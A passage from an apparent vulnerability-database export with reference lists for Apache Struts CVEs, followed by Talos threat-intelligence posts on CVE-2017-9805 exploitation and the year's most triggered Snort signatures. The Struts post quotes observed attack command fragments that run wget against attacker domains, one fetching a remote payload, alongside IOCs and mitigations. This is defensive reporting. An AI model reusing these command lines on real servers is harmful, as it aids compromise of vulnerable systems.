"OSV:GHSA-J77Q-2QQG-6989"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:141576", "PACKETSTORM:141630", "PACKETSTORM:144034", "PACKETSTORM:144050"]}, {"type": "pentestit", "idList": ["PENTESTIT:37744BAB82BC3A7B208CCD4945FA50F7", "PENTESTIT:C47AA6D1808026ACA45B1AD1CF25CA3B", "PENTESTIT:F5DFB26B34C75683830E664CBD58178F"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:110CC96D8440CC2A1EA0521D300634ED", "QUALYSBLOG:1A5EE9D9F7F017B2137FF614703A8605", "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "QUALYSBLOG:3B1C0CD4DA2F528B07C93411EA447658", "QUALYSBLOG:5C311FA52DD78D7015076D492F321DB0", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:9D071EBE42634FFBB58CB68A83252B41", "QUALYSBLOG:AB2325C5FBED5CF55517445600D470C1"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:078B46BBA3057CDE37845D48479CC3DD"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-5638", "RH:CVE-2017-9805"]}, {"type": "saint", "idList": ["SAINT:01D1CBFEFCD799FC1DCF4DD30F44F248", "SAINT:1AF820E0642E7888070E0C7DD723BBAE", "SAINT:484D58D595B8F6CEE787306160971308", "SAINT:49062325B1FAB54D731E4C8FBF78D940", "SAINT:5B8CEB9A64574FBC9B91366BB8FFC719", "SAINT:966010900F7632E797C552D31C2BB53A"]}, {"type": "seebug", "idList": ["SSV:92746", "SSV:92804", "SSV:96420", "SSV:96659"]}, {"type": "symantec", "idList": ["SMNTC-101098"]}, {"type": "talosblog", "idList": ["TALOSBLOG:991CC85C1D7CC3CD70110C7FAE123FAC", "TALOSBLOG:D985A5A21B218B47A518D6D4AB858393", "TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB", "TALOSBLOG:E8F926D413AF8A060A5CA7289C0EAD20"]}, {"type": "thn", "idList": ["THN:2707247140A4F620671B33D68FEB1EA9", "THN:3F47D7B66C8A65AB31FAC5823C96C34D", "THN:460709FF530ED7F35B5817A55F1BF2C6", "THN:6C0E5E35ABB362C8EA341381B3DD76D6", "THN:7FD924637D99697D78D53283817508DA", "THN:89C2482FECD181DD37C6DAEEB7A66FA9", "THN:ACD3479531482E2CA5A8E15EB6B47523", "THN:AF93AEDBDE6169AD1163D53979A4EA04"]}, {"type": "threatpost", "idList": ["THREATPOST:0308A7143D92E14583CCD684912ABD67", "THREATPOST:0DD2AEA1738F9B6612B1C845F3BC949F", "THREATPOST:12E93CDF8BAC1B158CE1737E859FDD80", "THREATPOST:1C2F8B65F8584E9BF67617A331A7B993", "THREATPOST:477B6029652B76463B5C5B7155CDF736", "THREATPOST:5ADABEB29891532ECFF2D6ABD99CAED4", "THREATPOST:5E633FD1C6A5B5BB74F1B6A8399001A2", "THREATPOST:7B2EAFA107D335014D553D78946C453E", "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "THREATPOST:A45826A8CDA7058392C4901D6AAD15F1", "THREATPOST:AACAA4F654495529E053D43901F00A81", "THREATPOST:AD5395CA5B3FD95FAD8E67B675D0AFCA", "THREATPOST:BF27EB1E464BD713B35779742C991C59", "THREATPOST:CD1CBFA154DFAA1F3DC0E2E5CFA58D0A", "THREATPOST:D5150098043DAE7CDF2E31618C33F5D2", "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "THREATPOST:F4E175435A7C5D2A4F16D46A939B175E", "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:141C894C9A7CCB3BB2E580A6C8292E37", "TRENDMICROBLOG:2E02CB122DC8C3DB57EF3830829E9913", "TRENDMICROBLOG:5232F354244FCA9F40053F10BE385E28", "TRENDMICROBLOG:5DA0AA0203F450ED9FF0CB21A89017BB", "TRENDMICROBLOG:71F44A4A56FE1111907DD39C26B46152"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-5638", "UB:CVE-2017-9805"]}, {"type": "vmware", "idList": ["VMSA-2017-0004", "VMSA-2017-0004.7"]}, {"type": "zdt", "idList": ["1337DAY-ID-27300", "1337DAY-ID-27316", "1337DAY-ID-28445", "1337DAY-ID-28454"]}]}, "backreferences": {"references": [{"type": "atlassian", "idList": ["ATLASSIAN:BAM-18242", "ATLASSIAN:CWD-4879"]}, {"type": "attackerkb", "idList": ["AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "AKB:BDF59C15-D64F-45D5-B1AC-D1B9DD354080"]}, {"type": "canvas", "idList": ["STRUTS_OGNL"]}, {"type": "cert", "idList": ["VU:112992", "VU:834067"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0197", "CPAI-2017-0676", "CPAI-2017-0742", "CPAI-2019-0832"]}, {"type": "cisa", "idList": ["CISA:C0680147E070CCC4182A654B22694B78"]}, {"type": "cisco", "idList": ["CISCO-SA-20170310-STRUTS2", "CISCO-SA-20170907-STRUTS2"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:C2B8B89ADB85BB41095EAA7D88C0E350"]}, {"type": "cve", "idList": ["CVE-2017-11774", "CVE-2017-5638", "CVE-2017-9805"]}, {"type": "dsquare", "idList": ["E-643"]}, {"type": "exploitdb", "idList": ["EDB-ID:42627"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:DEBBBD9CB5D7CBBF28AAD15BB9949E3A"]}, {"type": "f5", "idList": ["F5:K43451236", "F5:K84144321"]}, {"type": "fireeye", "idList": ["FIREEYE:A6971C196BCA3B73B3F64A1FE0801A5B"]}, {"type": "fortinet", "idList": ["FG-IR-17-205"]}, {"type": "github", "idList": ["GHSA-GG9M-FJ3V-R58C", "GHSA-J77Q-2QQG-6989"]}, {"type": "githubexploit", "idList": ["B41082A1-4177-53E2-A74C-8ABA13AA3E86"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170316-01-STRUTS2"]}, {"type": "ibm", "idList": ["6470A30C25E8E98A770393E4946FDE7CFE3362A1DD3B87E75F8DB1F7CE3E88A5", "7E0CCCCB457D8A77AB9E189B336C99165EE3DEBFD72C3969F0C1103ED1D1CC6D"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:C40BB28F51D206C8BB23721D1ECED353", "IMPERVABLOG:D4ED0576717DBEEDCF6B9B98BADC92BD", "IMPERVABLOG:DA39045C8E700086C560AAFFDBA589A6"]}, {"type": "kaspersky", "idList": ["KLA11113"]}, {"type": "kitploit", "idList": ["KITPLOIT:1841841790447853746", "KITPLOIT:2304674796555328667", "KITPLOIT:9079806502812490909"]}, {"type": "krebs", "idList": ["KREBS:EE70929DE902D9B233E209B73C1AD4A0"]}, {"type": "lenovo", "idList": ["LENOVO:PS500093-NOSID"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:4993027161793E66024E0B42522BB53D"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/STRUTS2_CONTENT_TYPE_OGNL", "MSF:EXPLOIT/MULTI/HTTP/STRUTS2_REST_XSTREAM"]}, {"type": "mscve", "idList": ["MS:CVE-2017-11774"]}, {"type": "mskb", "idList": ["KB4011196"]}, {"type": "mssecure", "idList": ["MSSECURE:23C760CCBA6BF2ED8D8132921A32C2A3"]}, {"type": "myhack58", "idList": ["MYHACK58:62201784024", "MYHACK58:62201784026", "MYHACK58:62201784086", "MYHACK58:62201784379", "MYHACK58:62201789104", "MYHACK58:62201789593"]}, {"type": "nessus", "idList": ["STRUTS_2_5_10_1_WIN_LOCAL.NASL", "STRUTS_2_5_13.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106640", "OPENVAS:1361412562310106646", "OPENVAS:1361412562310106647", "OPENVAS:1361412562310106652", "OPENVAS:1361412562310106653", "OPENVAS:1361412562310106736", "OPENVAS:1361412562310140190", "OPENVAS:1361412562310140229", "OPENVAS:1361412562310811922", "OPENVAS:1361412562310812024", "OPENVAS:1361412562310812028"]}, {"type": "oracle", "idList": ["ORACLE:CPUJUL2017"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:141576", "PACKETSTORM:141630", "PACKETSTORM:144034", "PACKETSTORM:144050"]}, {"type": "pentestit", "idList": ["PENTESTIT:37744BAB82BC3A7B208CCD4945FA50F7"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:110CC96D8440CC2A1EA0521D300634ED"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:078B46BBA3057CDE37845D48479CC3DD"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-5638", "RH:CVE-2017-9805"]}, {"type": "saint", "idList": ["SAINT:01D1CBFEFCD799FC1DCF4DD30F44F248", "SAINT:1AF820E0642E7888070E0C7DD723BBAE", "SAINT:49062325B1FAB54D731E4C8FBF78D940", "SAINT:966010900F7632E797C552D31C2BB53A"]}, {"type": "seebug", "idList": ["SSV:92746", "SSV:92804", "SSV:96420", "SSV:96659"]}, {"type": "symantec", "idList": ["SMNTC-101098"]}, {"type": "talosblog", "idList": ["TALOSBLOG:D985A5A21B218B47A518D6D4AB858393", "TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB"]}, {"type": "thn", "idList": ["THN:2707247140A4F620671B33D68FEB1EA9", "THN:3F47D7B66C8A65AB31FAC5823C96C34D", "THN:460709FF530ED7F35B5817A55F1BF2C6", "THN:6C0E5E35ABB362C8EA341381B3DD76D6", "THN:ACD3479531482E2CA5A8E15EB6B47523"]}, {"type": "threatpost", "idList": ["THREATPOST:0308A7143D92E14583CCD684912ABD67", "THREATPOST:477B6029652B76463B5C5B7155CDF736", "THREATPOST:5E633FD1C6A5B5BB74F1B6A8399001A2", "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "THREATPOST:AD5395CA5B3FD95FAD8E67B675D0AFCA", "THREATPOST:CD1CBFA154DFAA1F3DC0E2E5CFA58D0A", "THREATPOST:D5150098043DAE7CDF2E31618C33F5D2", "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:141C894C9A7CCB3BB2E580A6C8292E37", "TRENDMICROBLOG:2E02CB122DC8C3DB57EF3830829E9913", "TRENDMICROBLOG:5232F354244FCA9F40053F10BE385E28", "TRENDMICROBLOG:5DA0AA0203F450ED9FF0CB21A89017BB"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-9805"]}, {"type": "vmware", "idList": ["VMSA-2017-0004.7"]}, {"type": "zdt", "idList": ["1337DAY-ID-28445"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2017-11774", "epss": "0.967100000", "percentile": "0.993780000", "modified": "2023-03-14"}, {"cve": "CVE-2017-5638", "epss": "0.975380000", "percentile": "0.999830000", "modified": "2023-03-14"}, {"cve": "CVE-2017-9805", "epss": "0.975610000", "percentile": "0.999940000", "modified": "2023-03-14"}], "vulnersScore": -0.5}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1660012827, "score": 1683995972, "epss": 1678876529}, "_internal": {"score_hash": "a6b5c2fc2d4720872ca2f04dbbde3b89"}}

{"talosblog": [{"lastseen": "2017-09-08T17:15:47", "description": "<i>This post authored by <a href=\"https://twitter.com/infosec_nick\">Nick Biasini</a> with contributions from <a href=\"https://twitter.com/nschmx\">Alex Chiu</a>.</i><br /><br />Earlier this week, a critical vulnerability in <a href=\"https://cwiki.apache.org/confluence/display/WW/S2-052\">Apache Struts</a> was publicly disclosed in a security advisory. This new vulnerability, identified as CVE-2017-9805, manifests due to the way the REST plugin uses XStreamHandler with an instance of XStream for deserialization without any type filtering. As a result, a remote, unauthenticated attacker could achieve remote code execution on a host running a vulnerable version of Apache Struts.<br /><br />This isn't the only vulnerability that has been recently identified in Apache Struts. <a href=\"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html\">Earlier this year</a>, Talos responded to a zero-day vulnerability that was under active exploitation in the wild. Talos has observed exploitation activity targeting CVE-2017-9805 in a way that is similar to how CVE-2017-5638 was exploited back in March 2017.<br /><br /><a name='more'></a><br /><h3 id=\"h.yjfcx7oxvccx\">Details</h3>Immediately after the reports surfaced related to this exploit, Talos began researching how it operated and began work to develop coverage to prevent successful exploitation. This was achieved and we immediately began seeing active exploitation in the wild. Thus far, exploitation appears to be primarily scanning activity, with outbound requests that appear to be identifying systems that are potentially vulnerable. Below is a sample of the type of HTTP requests we have been observing.<br /><blockquote class=\"tr_bq\"><string>/bin/sh</string><string>-c</string><string>wget -qO /dev/null http://wildkind[.]ru:8082/?vulnerablesite</string></blockquote>This would initiate a wget request that would write the contents of the HTTP response to /dev/null. This indicates it is purely a scanning activity that identifies to the remote server which websites are potentially vulnerable to this attack. This is also a strong possibility since it includes the compromised website in the URL. There was one other small variation that was conducting a similar request to the same website.<br /><blockquote class=\"tr_bq\"><string>/bin/sh</string><string>-c</string><string>wget -qO /dev/null http://wildkind[.]ru:8082/?`echo ...vulnerablesite...`</string></blockquote>During our research we found that the majority of the activity was trying to POST to the path of /struts2-rest-showcase/orders/3. Additionally most of the exploitation attempts are sending the data to wildkind[.]ru, with a decent amount of the requests originating from the IP address associated with wildkind[.]ru, 188.120.246[.]215.<br /><br /><table align=\"center\" cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"margin-left: auto; margin-right: auto; text-align: center;\"><tbody><tr><td style=\"text-align: center;\"><a href=\"https://2.bp.blogspot.com/-43pwp2mOpHE/WbHJQlk9djI/AAAAAAAABTo/cc3B9_qI3U4-sU6F-Eq3Rf2MsdlzqJB8wCLcBGAs/s1600/image2.png\" imageanchor=\"1\" style=\"margin-left: auto; margin-right: auto;\"><img border=\"0\" data-original-height=\"867\" data-original-width=\"1600\" height=\"346\" src=\"https://2.bp.blogspot.com/-43pwp2mOpHE/WbHJQlk9djI/AAAAAAAABTo/cc3B9_qI3U4-sU6F-Eq3Rf2MsdlzqJB8wCLcBGAs/s640/image2.png\" width=\"640\" /></a></td></tr><tr><td class=\"tr-caption\" style=\"text-align: center;\">Example of in the wild exploitation</td></tr></tbody></table>Other exploitation attempts have been identified where Talos believes another threat actor appears to be exploiting the vulnerability for a different purpose. An example of the web requests found in the exploitation attempts can be found below.<br /><blockquote class=\"tr_bq\"><string>wget</string><string>hxxp://st2buzgajl.alifuzz[.]com/052</string></blockquote>Unfortunately, we were unable to retrieve the potentially malicious file that was being served at this particular location. If the previous Struts vulnerability is any indicator, the payloads could vary widely and encompass threats such as DDoS bots, spam bots, and various other malicious payloads.<br /><br /><h3 id=\"h.1teoyjf4qh2n\">IOCs</h3>IP Addresses Observed: <br /><ul><li>188.120.246[.]215</li><li>101.37.175[.]165</li><li>162.158.182[.]26</li><li>162.158.111[.]235</li><li>141.101.76[.]226</li><li>141.101.105[.]240</li></ul>Domains Contacted:<br /><ul><li>wildkind[.]ru</li><li>st2buzgajl.alifuzz[.]com</li></ul>Commonly Used Path:<br /><ul><li>/struts2-rest-showcase/orders/3</li></ul><h3 id=\"h.yv6ldyfuky10\">Mitigation</h3>Apache has released a new version of Struts that resolves this issue. If you believe that you have a potentially vulnerable version of Apache struts there are two options: upgrade to Struts 2.5.13 / Struts 2.3.34 or remove the REST plugin if it's not actively being used. Instructions to achieve this are provided as part of the <a href=\"https://cwiki.apache.org/confluence/display/WW/S2-052\">security bulletin</a> and should be reviewed and tested before applying in a production environment. In the event it's not possible to upgrade or remove the REST plugin, limiting it to server normal pages and JSONs may help limit the risk the compromise.<br /><h3 id=\"h.dp04v9qgtelp\">Conclusion</h3>This is the latest in a long line of vulnerabilities that are exposing servers to potential exploitation. In today's threat landscape a lot of attention is paid to endpoint systems being compromised, and with good reason, as it accounts for the majority of the malicious activity we observe on a daily basis. However, that does not imply that patching of servers should not be an extremely high priority. These types of systems, if compromised, can potentially expose critical data and systems to adversaries.<br /><br />The vulnerability is yet another example of how quickly miscreants will move to take advantage of these types of issues. Within 48 hours of disclosure we were seeing systems activity exploiting the vulnerability. To their credit the researchers disclosed the vulnerability responsibly and a patch was available before disclosure occurred. However, with money at stake bad guys worked quickly to reverse engineer the issue and successfully develop exploit code to take advantage of it. In today's reality you no longer have weeks or months to respond to these type of vulnerabilities, it's now down to days or hours and every minute counts. Ensure you have protections in place or patches applied to help prevent your enterprise from being impacted.<br /><h3 id=\"h.myaej86w3pvi\">Coverage</h3>Talos has released the following Snort rule to address this vulnerability. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on <a href=\"https://snort.org/products\">Snort.org</a>.<br /><br />Snort Rule: 44315<br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://2.bp.blogspot.com/-U6SRWeSjeTM/WbHJZe1FSrI/AAAAAAAABTs/N-Z3A0kgDZUf0j3-p0b7-PSV7hVX3TZMACLcBGAs/s1600/image1.png\" imageanchor=\"1\" style=\"clear: left; float: left; margin-bottom: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"1341\" data-original-width=\"1600\" height=\"268\" src=\"https://2.bp.blogspot.com/-U6SRWeSjeTM/WbHJZe1FSrI/AAAAAAAABTs/N-Z3A0kgDZUf0j3-p0b7-PSV7hVX3TZMACLcBGAs/s320/image1.png\" width=\"320\" /></a></div><br /><br />Network Security appliances such as <a href=\"https://www.cisco.com/c/en/us/products/security/firewalls/index.html\">NGFW</a>, <a href=\"https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html\">NGIPS</a>, and <a href=\"https://meraki.cisco.com/products/appliances\">Meraki MX</a> can detect malicious activity associated with this threat.<br /><br /><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/feedburner/Talos?a=nXfzZg_yH_w:t_cz9fDBuvo:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/feedburner/Talos/~4/nXfzZg_yH_w\" height=\"1\" width=\"1\" alt=\"\"/>", "cvss3": {}, "published": "2017-09-07T15:42:00", "title": "Another Apache Struts Vulnerability Under Active Exploitation", "type": "talosblog", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-08T15:49:47", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/nXfzZg_yH_w/apache-struts-being-exploited.html", "id": "TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-29T19:59:49", "description": "_This post was written by [Martin Lee](<https://www.blogger.com/profile/17941683095374027310>) and [Vanja Svajcer](<https://twitter.com/vanjasvajcer>)._\n\n \n\n\n2017 was an eventful year for cyber security with high profile vulnerabilities that allowed self-replicating worm attacks such as [WannaCry](<https://blog.talosintelligence.com/2017/05/wannacry.html>) and [BadRabbit](<http://blog.talosintelligence.com/2017/10/bad-rabbit.html>) to impact organizations throughout the world. In 2017, Talos researchers discovered many new attacks including backdoors in legitimate software such as [CCleaner](<https://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html>), designed to target high tech companies as well as [M.E.Doc](<http://blog.talosintelligence.com/2017/07/the-medoc-connection.html>), responsible for initial spread of [Nyetya](<http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html>). Despite all those, headline making attacks are only a small part of the day to day protection provided by security systems.\n\n \n\n\nIn this post we review some of the findings created by investigating the most frequently triggered Snort signatures as reported by [Cisco Meraki](<https://meraki.cisco.com>) systems and included in the Snort default policy set.\n\n \n\n\n## Top 5 Signatures\n\n \n\n\nSnort signatures are classified into different classes based on the type of activity detected with the most commonly reported class type being \u201cTrojan-activity\u201d followed by \u201cPolicy-violation\u201d and \u201cMisc-activity\u201d. Some less frequently reported class types such as \u201cAttempted-admin\u201d and \u201cWeb-application-attack\u201d are particularly interesting in the context of detecting malicious inbound and outbound network traffic.\n\n \n\n\nSnort signatures are identified from three parts. The Generator ID (GID), the Signature ID (SID) and revision number. The GID identifies what part of Snort generates the event; \u20181\u2019 indicates an event has been generated from the text rules subsystem. The SID uniquely identifies the rule itself. You can search for information on SIDs via the search box on the [Snort website](<https://www.snort.org/>). The revision number is the version of the rule; be sure to use the latest revision of any rule.\n\n \n\n\nWithout a further ado, here are the top 5 triggered signatures within policy in reverse order, just as you would expect from a yearly Top of the Snort alerts chart. \n\n### #5 - 1:39867:3 \u201cSuspicious .tk dns query\u201d\n\n \n\n\nThe .tk top level domain is owned by the South Pacific territory of Tokelau. The domain registry allows for the registration of domains without payment, which leads to the .tk top level domain being one of the prolific in terms of number of domain names registered. However, this free registration leads to .tk domains frequently being abused by attackers.\n\n \n\n\nThis signature triggers on DNS lookups for .tk domains. Such a case doesn\u2019t necessarily mean that such a lookup is malicious in nature, but it can be a useful indicator for suspicious activity on a network. A sharp increase in this rule triggering on a network should be investigated as to the cause, especially if a single device is responsible for a large proportion of these triggers.\n\n \n\n\nOther, similar signatures detecting DNS lookups to other rarely used top level domains such as .bit, .pw and .top also made into our list of top 20 most triggered rules.\n\n### #4 - 1:23493:6 \u201cWin.Trojan.ZeroAccess outbound connection\u201d\n\n \n\n\nZeroAccess is a trojan that infects Windows systems, installing a rootkit to hide its presence on the affected machine and serves as a platform for conducting click fraud campaigns. This rule detects UDP packets sent by an infected system to so called super nodes, which participate in the network of command and control servers. The rule can be used to block outbound communication from the malware.\n\n \n\n\nZeroAccess is a state of the art rootkit and is able to hide from the basic detection techniques on the infected machine. However, network detection using IPS such as Snort can quickly pinpoint a source of the malicious ZeroAccess traffic as it generates a fairly noisy and regular communication pattern.\n\n \n\n\nThe malware sends a UDP packet to check with a super node once every second, so a single affected organization is expected to have many alerts. This may be one of the reasons why the ZeroAccess detection signature is placed high on our list.\n\n### #3 - 1:41083:1 \u201csuspicious .bit dns query\u201d\n\n \n\n\nThe .bit top level domain extension is relatively obscure, but is occasionally used for hosting malware C2 systems with Necurs being one of the families using it as a part of the botnet communication. The .bit TLD is managed using Namecoin, a distributed ledger with no central authority that is one of the first forks of the Bitcoin cryptocurrency. The decentralised nature of .bit domains means that few DNS servers resolve the domains, but equally the domains are resistant to take down.\n\n \n\n\nThe signature triggers on DNS lookups for .bit domains. As with .tk lookups, if the signature triggers, this doesn\u2019t necessarily mean that such a lookup is malicious in nature. However, a sharp increase in the rule triggering may warrant investigation.\n\n### #2 - 1:42079:1 \u201cWin.Trojan.Jenxcus outbound connection attempt with unique User-Agent\u201d\n\n \n\n\nJenxcus is more of a worm than a trojan, despite the naming used in the human readable description of the signature. It spreads by copying itself to removable and shared drives and allows the attacker to remotely access and control the infected system. Like many trojans, once a system is infected, Jenxcus seeks to establish contact with its\u2019 C2 infrastructure. This contact is made with a HTTP POST request using a specific user-agent string. The user-agent string itself is specific to this trojan and its many variants, and can be detected and blocked using this signature.\n\n### #1 - 1:40522:3 \u201cUnix.Trojan.Mirai variant post compromise fingerprinting\u201d\n\n \n\n\nInternet of Things (IoT) security is something which we have written about [extensively](<http://blog.talosintelligence.com/2017/06/the-internet-of-vulnerable-things.html>). The Mirai botnet, and variants, continue to try and infect IoT devices through attempting to login with default usernames and passwords. Once the malware successfully accesses a device, it will check that the device behaves as expected and not like a honeypot. It is this check which is detected by this rule. This post compromise activity has been constantly present throughout the year and at the peak of its activity in February accounted for over 20% of all alerts reported daily.\n\n[![](https://4.bp.blogspot.com/-If7RuT_F_2M/Wm9fBRZAa8I/AAAAAAAAADo/C_BUhkG31aovUEOcnZ-c7-z520ZS9dVgQCLcBGAs/s1600/mirai.jpg)](<https://4.bp.blogspot.com/-If7RuT_F_2M/Wm9fBRZAa8I/AAAAAAAAADo/C_BUhkG31aovUEOcnZ-c7-z520ZS9dVgQCLcBGAs/s1600/mirai.jpg>)\n\n \n\n\n## Inbound, Outbound or Internal\n\n \n\n\nNetwork traffic can cross an IDS from external to internal (inbound) from the internal to external (outbound) or pass the sensor without traversing it, as internal traffic. An alert may be triggered and logged for any of these scenarios.\n\n \n\n\nOutbound signatures were triggered during 2017 much more frequently than internal, which in turn were more frequent than inbound with ratios of approximately 9:6:5. The profile of the alerts are different for each direction. Inbound alerts are likely to detect traffic that can be attributed to attacks on various server-side applications such as web applications or databases. Outbound alerts are more likely to contain detection of outgoing traffic caused by malware infected endpoints. Internal alerts are most likely to be due to trojan or miscellaneous activity.\n\n \n\n\nLooking at these data sets in more detail gives us the following:\n\n[![](https://4.bp.blogspot.com/-Vx8dv-DQBMw/Wm9hby18fUI/AAAAAAAAAD0/1S9x5QFNs-cNMqigLaj8NgQddaLl-vm8gCLcBGAs/s1600/inbound.jpg)](<https://4.bp.blogspot.com/-Vx8dv-DQBMw/Wm9hby18fUI/AAAAAAAAAD0/1S9x5QFNs-cNMqigLaj8NgQddaLl-vm8gCLcBGAs/s1600/inbound.jpg>)\n\n \n\n\n\u201cTrojan-activity\u201d class type alerts were dominated by the Mirai post compromise fingerprinting attempts, but this category also contains blocked attempts to download executable files disguised as plain text, and traffic associated with Zeus, Swabfex, Soaphrish, Glupteba malware.\n\n \n\n\nThe \u201cAttempted-user\u201d class type covers attempts to exploit user level vulnerabilities. The majority of the most frequently triggered signatures in this set were detected attempts to exploit Internet Explorer vulnerabilities.\n\n \n \n\n\nOutbound signatures most frequently reported class types of detections triggering on internal network traffic belong to the \u201cMisc-activity\u201d and \u201cTrojan-activity\u201d classes.\n\n[![](https://1.bp.blogspot.com/-3ReC-VJ4c4U/Wm9efWbE1RI/AAAAAAAAADg/uLB_1xM1ts8q8BGfEQSnukBhvGwpxTDkgCLcBGAs/s1600/outbound.jpg)](<https://1.bp.blogspot.com/-3ReC-VJ4c4U/Wm9efWbE1RI/AAAAAAAAADg/uLB_1xM1ts8q8BGfEQSnukBhvGwpxTDkgCLcBGAs/s1600/outbound.jpg>)\n\n \n\n\nThe most frequently triggered signatures within the \u201cTrojan-activity\u201d signature class are the Jenxcus and .bit dns activity signatures discussed above. Other prevalent trojan activity is related to ZeroAccess, Cidox, Zeus and Ramnit trojans.\n\n \n \n\n\nInternal traffic signature types most frequently reported detection class types belong to the \u201cMisc-activity\u201d and \u201cTrojan-activity\u201d classes.\n\n[![](https://3.bp.blogspot.com/-WPqQaY8jpX4/Wm9csL0dQbI/AAAAAAAAADI/EGmC0y1-koUKV7SjLPqSqSENCB1SCIfxACLcBGAs/s1600/internal.jpg)](<https://3.bp.blogspot.com/-WPqQaY8jpX4/Wm9csL0dQbI/AAAAAAAAADI/EGmC0y1-koUKV7SjLPqSqSENCB1SCIfxACLcBGAs/s1600/internal.jpg>)\n\n \n\n\nMisc activity signatures include detections for various traffic patterns which do not easily fit into any other specific class types. This includes detection of DNS requests to less common top level domains like .top, .win, .trade, detection of traffic to domains known to be used by adware and other potentially unwanted applications (PUAs) as well as detection of suspicious HTTP user-agent strings.\n\n \n\n\n## Peaks and Troughs\n\n \n\n\nAttacks are happening continuously. Every hour of the day, every day of the year signatures are being triggered by the constant background noise of the attackers\u2019 activity. However, some signatures are clearly triggered by malicious activity being conducted during a particular period.\n\n \n\n\nOn March 6th, Apache disclosed an Apache Struts command injection vulnerability [CVE-2017-5638](<https://www.cvedetails.com/cve/cve-2017-5638>). Talos released signature [1:41818](<https://www.snort.org/rule_docs/1-41818>) to detect and block exploitation of the vulnerability. Within a couple of days, attackers were conducting [widespread campaigns](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>) to identify and compromise vulnerable systems.\n\n \n\n\nAs shown in the graph below, attempts to exploit CVE-2017-5638 comprised more than 20% of all triggering signatures at the peak of the malicious activity. This campaign soon abated, but never ceased completely, until a second large peak in activity occurred over 6 days at the end of October.\n\n[![](https://4.bp.blogspot.com/-0qQJHwb3FeY/Wm9ijI4-c0I/AAAAAAAAAEI/F46PdClpxsE7hgYoXRYVqr9HyqK37-ivQCLcBGAs/s1600/struts.jpg)](<https://4.bp.blogspot.com/-0qQJHwb3FeY/Wm9ijI4-c0I/AAAAAAAAAEI/F46PdClpxsE7hgYoXRYVqr9HyqK37-ivQCLcBGAs/s1600/struts.jpg>)\n\n \n\n\nThis graph neatly illustrates the importance of patching as well as installing and enabling signatures for new vulnerabilities as soon as possible. There may be a very short period of time between the disclosure of a vulnerability and the widespread attempted exploitation of the vulnerability by threat actors.\n\n \n\n\nSimilarly, once an initial attempt to compromise is over, the same attack may recommence some time later, so defences need to be maintained in order to ensure that systems are kept protected.\n\n \n\n\nAnother interesting pattern showing several periods of increased activity can be seen in the timeline for signature [1:40843](<https://www.snort.org/rule_docs/1-40843>). This signature detects and blocks the so called SSL Death Alert Denial of Service vulnerability in OpenSSL ([CVE-2016-8610](<https://tools.cisco.com/security/center/viewAlert.x?alertId=49575>)). An attacker can exploit vulnerable systems over the network to consume 100% CPU, preventing the system from responding to legitimate requests.\n\nFor extended periods during 2017, this vulnerability was not heavily targeted by attackers. However there are very clear periods when attackers were conducting campaigns to exploit this 